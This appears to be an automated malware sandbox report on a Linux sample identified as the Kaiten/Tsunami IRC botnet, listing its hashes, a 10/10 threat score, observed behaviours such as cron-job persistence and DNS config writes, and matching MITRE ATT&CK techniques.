Overview

overview

10

Static

static

7

fa856be9e8...8192d8

ubuntu-18.04-amd64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    fa856be9e8018c3a7d4d2351398192d8

  • Size

    40KB

  • Sample

    231222-vjshfadee6

  • MD5

    fa856be9e8018c3a7d4d2351398192d8

  • SHA1

    2bb922f78643a91cf4983482fd2f85d25f1a7073

  • SHA256

    8b929fa993b6eb2bb37281fd265c19c862c4124c770e7c99ce5997a667d0e11b

  • SHA512

    a285f2a0e342d7d8c6fdaf27e6e595707da183e7f793b5a94a714cf7c9cc9e05492e32178479eeaddf740625e568373f1c1069a709fd914bc65fe1f0a1fad1d2

  • SSDEEP

    768:0g8NC9SEia11gVCLI++yrmO2pSEVChObouBkvYwxE3RSinbcuyD7UncG/Hpa0kTb:0g8NC9SENHLIdkmO2pSRhPuBkvYr3Mim

Score
10/10
kaitenbotnetlinuxpersistenceupx

Malware Config

Targets

    • Target

      fa856be9e8018c3a7d4d2351398192d8

    • Size

      40KB

    • MD5

      fa856be9e8018c3a7d4d2351398192d8

    • SHA1

      2bb922f78643a91cf4983482fd2f85d25f1a7073

    • SHA256

      8b929fa993b6eb2bb37281fd265c19c862c4124c770e7c99ce5997a667d0e11b

    • SHA512

      a285f2a0e342d7d8c6fdaf27e6e595707da183e7f793b5a94a714cf7c9cc9e05492e32178479eeaddf740625e568373f1c1069a709fd914bc65fe1f0a1fad1d2

    • SSDEEP

      768:0g8NC9SEia11gVCLI++yrmO2pSEVChObouBkvYwxE3RSinbcuyD7UncG/Hpa0kTb:0g8NC9SENHLIdkmO2pSRhPuBkvYr3Mim

    Score
    10/10
    kaitenbotnetpersistence

    • Detects Kaiten/Tsunami Payload

    • Kaiten/Tsunami

      Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

      botnetkaiten

    • Writes DNS configuration

      Writes data to DNS resolver config file.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

      persistence

    • Enumerates running processes

      Discovers information about currently running processes on the system

    behavioral1

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1
T1053

Persistence

Scheduled Task/Job

1
T1053

Privilege Escalation

Scheduled Task/Job

1
T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Dynamic Resolution

1
T1568

Impact

Resource Development

Reconnaissance

Tasks